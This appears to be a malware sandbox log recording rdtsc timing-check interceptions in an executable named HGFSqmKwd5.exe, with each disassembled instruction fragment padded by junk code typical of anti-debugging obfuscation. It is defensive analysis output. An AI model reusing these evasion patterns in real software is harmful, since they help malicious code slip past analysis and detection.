Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 1690E10 second address: 1690E7A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4464F4BF1Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b jmp 00007F4464F4BF21h 0x00000010 nop 0x00000011 push 00000000h 0x00000013 push ebx 0x00000014 call 00007F4464F4BF18h 0x00000019 pop ebx 0x0000001a mov dword ptr [esp+04h], ebx 0x0000001e add dword ptr [esp+04h], 00000016h 0x00000026 inc ebx 0x00000027 push ebx 0x00000028 ret 0x00000029 pop ebx 0x0000002a ret 0x0000002b clc 0x0000002c xchg eax, ebx 0x0000002d jmp 00007F4464F4BF21h 0x00000032 push eax 0x00000033 push eax 0x00000034 push edx 0x00000035 jnp 00007F4464F4BF23h 0x0000003b jmp 00007F4464F4BF1Dh 0x00000040 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 169233A second address: 1692356 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 je 00007F4464DAB8DAh 0x0000000c jmp 00007F4464DAB8CEh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 169343A second address: 1693444 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F4464F4BF16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 16932A9 second address: 16932AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 1693444 second address: 1693449 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 1693449 second address: 1693493 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4464DAB8D5h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f ja 00007F4464DAB8CCh 0x00000015 push 00000000h 0x00000017 sub dword ptr [ebp+129C270Eh], edi 0x0000001d push 00000000h 0x0000001f adc si, 560Ah 0x00000024 push eax 0x00000025 push eax 0x00000026 push edx 0x00000027 push eax 0x00000028 push edx 0x00000029 jmp 00007F4464DAB8CBh 0x0000002e rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 1693493 second address: 1693499 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 169675F second address: 1696768 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 169892D second address: 16989B4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push ebx 0x0000000b call 00007F4464F4BF18h 0x00000010 pop ebx 0x00000011 mov dword ptr [esp+04h], ebx 0x00000015 add dword ptr [esp+04h], 0000001Bh 0x0000001d inc ebx 0x0000001e push ebx 0x0000001f ret 0x00000020 pop ebx 0x00000021 ret 0x00000022 mov esi, 0C2B6E4Ah 0x00000027 push 00000000h 0x00000029 push 00000000h 0x0000002b push edx 0x0000002c call 00007F4464F4BF18h 0x00000031 pop edx 0x00000032 mov dword ptr [esp+04h], edx 0x00000036 add dword ptr [esp+04h], 00000016h 0x0000003e inc edx 0x0000003f push edx 0x00000040 ret 0x00000041 pop edx 0x00000042 ret 0x00000043 mov dword ptr [ebp+12B4CDC7h], edi 0x00000049 push 00000000h 0x0000004b push 00000000h 0x0000004d push edx 0x0000004e call 00007F4464F4BF18h 0x00000053 pop edx 0x00000054 mov dword ptr [esp+04h], edx 0x00000058 add dword ptr [esp+04h], 00000015h 0x00000060 inc edx 0x00000061 push edx 0x00000062 ret 0x00000063 pop edx 0x00000064 ret 0x00000065 push eax 0x00000066 push eax 0x00000067 push edx 0x00000068 jmp 00007F4464F4BF1Fh 0x0000006d rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 16989B4 second address: 16989BE instructions: 0x00000000 rdtsc 0x00000002 jo 00007F4464DAB8CCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 1648EF7 second address: 1648EFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 169FD0D second address: 169FD12 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 16A0250 second address: 16A0254 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 16A0254 second address: 16A02D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jno 00007F4464DAB8D8h 0x0000000e nop 0x0000000f or ebx, 365FC995h 0x00000015 mov dword ptr [ebp+129C1A60h], edi 0x0000001b push 00000000h 0x0000001d push 00000000h 0x0000001f push ebp 0x00000020 call 00007F4464DAB8C8h 0x00000025 pop ebp 0x00000026 mov dword ptr [esp+04h], ebp 0x0000002a add dword ptr [esp+04h], 0000001Dh 0x00000032 inc ebp 0x00000033 push ebp 0x00000034 ret 0x00000035 pop ebp 0x00000036 ret 0x00000037 mov edi, dword ptr [ebp+12B4055Ah] 0x0000003d push 00000000h 0x0000003f jmp 00007F4464DAB8CCh 0x00000044 xchg eax, esi 0x00000045 push eax 0x00000046 push edx 0x00000047 jmp 00007F4464DAB8D9h 0x0000004c rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 16A02D8 second address: 16A02DD instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 16A23B5 second address: 16A23B9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 16A23B9 second address: 16A23BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 16A23BF second address: 16A23E8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F4464DAB8D9h 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 16A23E8 second address: 16A23ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 16A23ED second address: 16A2403 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F4464DAB8D1h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 16A4391 second address: 16A4395 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 16A0474 second address: 16A0483 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jne 00007F4464DAB8C6h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 16A0483 second address: 16A0498 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 jnp 00007F4464F4BF24h 0x0000000d push eax 0x0000000e push edx 0x0000000f ja 00007F4464F4BF16h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 16A53A7 second address: 16A53EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 push eax 0x00000007 jp 00007F4464DAB8CAh 0x0000000d push eax 0x0000000e push edi 0x0000000f pop edi 0x00000010 pop eax 0x00000011 nop 0x00000012 mov di, 321Dh 0x00000016 push 00000000h 0x00000018 push 00000000h 0x0000001a push ecx 0x0000001b call 00007F4464DAB8C8h 0x00000020 pop ecx 0x00000021 mov dword ptr [esp+04h], ecx 0x00000025 add dword ptr [esp+04h], 00000018h 0x0000002d inc ecx 0x0000002e push ecx 0x0000002f ret 0x00000030 pop ecx 0x00000031 ret 0x00000032 push 00000000h 0x00000034 mov edi, dword ptr [ebp+129C27E0h] 0x0000003a push eax 0x0000003b push eax 0x0000003c push edx 0x0000003d push eax 0x0000003e push edx 0x0000003f push edi 0x00000040 pop edi 0x00000041 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 16A53EE second address: 16A53F4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 16A35D8 second address: 16A35EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop esi 0x00000008 push eax 0x00000009 jl 00007F4464DAB8D0h 0x0000000f pushad 0x00000010 push edx 0x00000011 pop edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 16A554C second address: 16A5550 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 16A5550 second address: 16A5573 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4464DAB8CEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F4464DAB8CDh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 16A7393 second address: 16A7399 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 16A6486 second address: 16A648C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 16A648C second address: 16A64A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F4464F4BF23h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 16A64A8 second address: 16A64AD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 16AA378 second address: 16AA3F1 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007F4464F4BF29h 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e push 00000000h 0x00000010 push edi 0x00000011 call 00007F4464F4BF18h 0x00000016 pop edi 0x00000017 mov dword ptr [esp+04h], edi 0x0000001b add dword ptr [esp+04h], 00000014h 0x00000023 inc edi 0x00000024 push edi 0x00000025 ret 0x00000026 pop edi 0x00000027 ret 0x00000028 mov ebx, dword ptr [ebp+129C1E15h] 0x0000002e push 00000000h 0x00000030 push 00000000h 0x00000032 push ebx 0x00000033 call 00007F4464F4BF18h 0x00000038 pop ebx 0x00000039 mov dword ptr [esp+04h], ebx 0x0000003d add dword ptr [esp+04h], 00000016h 0x00000045 inc ebx 0x00000046 push ebx 0x00000047 ret 0x00000048 pop ebx 0x00000049 ret 0x0000004a stc 0x0000004b push 00000000h 0x0000004d ja 00007F4464F4BF17h 0x00000053 clc 0x00000054 push eax 0x00000055 push eax 0x00000056 push edx 0x00000057 jnl 00007F4464F4BF18h 0x0000005d rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 16AB3F5 second address: 16AB402 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 js 00007F4464DAB8C6h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 16AD4CE second address: 16AD4D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 16AD4D5 second address: 16AD4E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push edi 0x0000000a pushad 0x0000000b popad 0x0000000c pop edi 0x0000000d rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 16A9539 second address: 16A953D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 16A953D second address: 16A9552 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4464DAB8D1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 16AB623 second address: 16AB627 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 16AA542 second address: 16AA5A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 nop 0x00000006 push 00000000h 0x00000008 push eax 0x00000009 call 00007F4464DAB8C8h 0x0000000e pop eax 0x0000000f mov dword ptr [esp+04h], eax 0x00000013 add dword ptr [esp+04h], 0000001Bh 0x0000001b inc eax 0x0000001c push eax 0x0000001d ret 0x0000001e pop eax 0x0000001f ret 0x00000020 or edi, dword ptr [ebp+129C2AACh] 0x00000026 push dword ptr fs:[00000000h] 0x0000002d cmc 0x0000002e mov dword ptr fs:[00000000h], esp 0x00000035 mov dword ptr [ebp+129C1ED0h], ecx 0x0000003b xor ebx, dword ptr [ebp+129C269Dh] 0x00000041 mov eax, dword ptr [ebp+129C0515h] 0x00000047 mov edi, dword ptr [ebp+129C1A6Eh] 0x0000004d push FFFFFFFFh 0x0000004f push eax 0x00000050 jnp 00007F4464DAB8DBh 0x00000056 push eax 0x00000057 push edx 0x00000058 pushad 0x00000059 popad 0x0000005a rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 16AB627 second address: 16AB62B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 16AB62B second address: 16AB631 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 16AE469 second address: 16AE46E instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 16A8648 second address: 16A864C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 16A864C second address: 16A8650 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 16AE59B second address: 16AE61F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4464DAB8CFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jc 00007F4464DAB8DDh 0x00000010 jmp 00007F4464DAB8D7h 0x00000015 nop 0x00000016 push 00000000h 0x00000018 push edi 0x00000019 call 00007F4464DAB8C8h 0x0000001e pop edi 0x0000001f mov dword ptr [esp+04h], edi 0x00000023 add dword ptr [esp+04h], 00000016h 0x0000002b inc edi 0x0000002c push edi 0x0000002d ret 0x0000002e pop edi 0x0000002f ret 0x00000030 push dword ptr fs:[00000000h] 0x00000037 mov dword ptr [ebp+129C3727h], edx 0x0000003d mov dword ptr fs:[00000000h], esp 0x00000044 and bx, 9CB0h 0x00000049 mov eax, dword ptr [ebp+129C121Dh] 0x0000004f mov dword ptr [ebp+129C27D2h], eax 0x00000055 push FFFFFFFFh 0x00000057 or dword ptr [ebp+12B618A8h], ecx 0x0000005d nop 0x0000005e push eax 0x0000005f push edx 0x00000060 push ebx 0x00000061 push esi 0x00000062 pop esi 0x00000063 pop ebx 0x00000064 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 16AE61F second address: 16AE65A instructions: 0x00000000 rdtsc 0x00000002 jng 00007F4464F4BF2Dh 0x00000008 jmp 00007F4464F4BF27h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push ebx 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F4464F4BF26h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 16AF65C second address: 16AF660 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 16AF660 second address: 16AF66A instructions: 0x00000000 rdtsc 0x00000002 jl 00007F4464F4BF16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 16AF66A second address: 16AF675 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jns 00007F4464DAB8C6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 16AF675 second address: 16AF693 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 jmp 00007F4464F4BF21h 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 16B2433 second address: 16B2438 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 16B63B9 second address: 16B63C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop esi 0x00000006 pushad 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 16B63C7 second address: 16B63CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 16BA160 second address: 16BA17D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F4464F4BF16h 0x0000000a popad 0x0000000b pushad 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f jc 00007F4464F4BF16h 0x00000015 push esi 0x00000016 pop esi 0x00000017 popad 0x00000018 pushad 0x00000019 push ebx 0x0000001a pop ebx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 16BA17D second address: 16BA19F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F4464DAB8D9h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 16BFAE9 second address: 16BFAEE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 16C63E1 second address: 16C6414 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F4464DAB8D7h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F4464DAB8D6h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 16C6414 second address: 16C642B instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 jmp 00007F4464F4BF1Dh 0x0000000a pop ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 16C508E second address: 16C50A4 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F4464DAB8C6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F4464DAB8CAh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 16C50A4 second address: 16C50A9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 16C56A8 second address: 16C56AE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 16C56AE second address: 16C56DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F4464F4BF1Eh 0x0000000b pushad 0x0000000c jmp 00007F4464F4BF27h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 16C56DC second address: 16C5703 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F4464DAB8CEh 0x0000000d jnl 00007F4464DAB8D1h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 16C5703 second address: 16C570D instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F4464F4BF22h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 16CA84E second address: 16CA854 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 168E365 second address: 168E37E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4464F4BF25h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 168E37E second address: 16743AC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4464DAB8CCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e lea eax, dword ptr [ebp+12B70119h] 0x00000014 mov ecx, 5094E768h 0x00000019 push eax 0x0000001a jmp 00007F4464DAB8D1h 0x0000001f mov dword ptr [esp], eax 0x00000022 cld 0x00000023 call dword ptr [ebp+129C23D9h] 0x00000029 jng 00007F4464DAB8E6h 0x0000002f jmp 00007F4464DAB8D6h 0x00000034 push edi 0x00000035 push eax 0x00000036 push edx 0x00000037 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 168E475 second address: 168E479 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 168EA01 second address: 168EA52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 mov eax, dword ptr [eax] 0x00000008 push ecx 0x00000009 pushad 0x0000000a push esi 0x0000000b pop esi 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f pop ecx 0x00000010 mov dword ptr [esp+04h], eax 0x00000014 pushad 0x00000015 pushad 0x00000016 jmp 00007F4464DAB8CCh 0x0000001b push ecx 0x0000001c pop ecx 0x0000001d popad 0x0000001e jmp 00007F4464DAB8D5h 0x00000023 popad 0x00000024 pop eax 0x00000025 mov edi, dword ptr [ebp+129C2AC4h] 0x0000002b push 5F6FDA80h 0x00000030 push eax 0x00000031 push edx 0x00000032 push eax 0x00000033 js 00007F4464DAB8C6h 0x00000039 pop eax 0x0000003a rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 168EB39 second address: 168EB43 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007F4464F4BF16h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 168EBB4 second address: 168EC09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop eax 0x00000006 push eax 0x00000007 push ecx 0x00000008 pushad 0x00000009 jc 00007F4464DAB8C6h 0x0000000f jnl 00007F4464DAB8C6h 0x00000015 popad 0x00000016 pop ecx 0x00000017 xchg eax, esi 0x00000018 mov edi, dword ptr [ebp+129C26BEh] 0x0000001e mov di, ax 0x00000021 nop 0x00000022 jg 00007F4464DAB8D3h 0x00000028 push edx 0x00000029 jmp 00007F4464DAB8CBh 0x0000002e pop edx 0x0000002f push eax 0x00000030 pushad 0x00000031 jng 00007F4464DAB8DBh 0x00000037 push edx 0x00000038 push eax 0x00000039 push edx 0x0000003a rdtsc
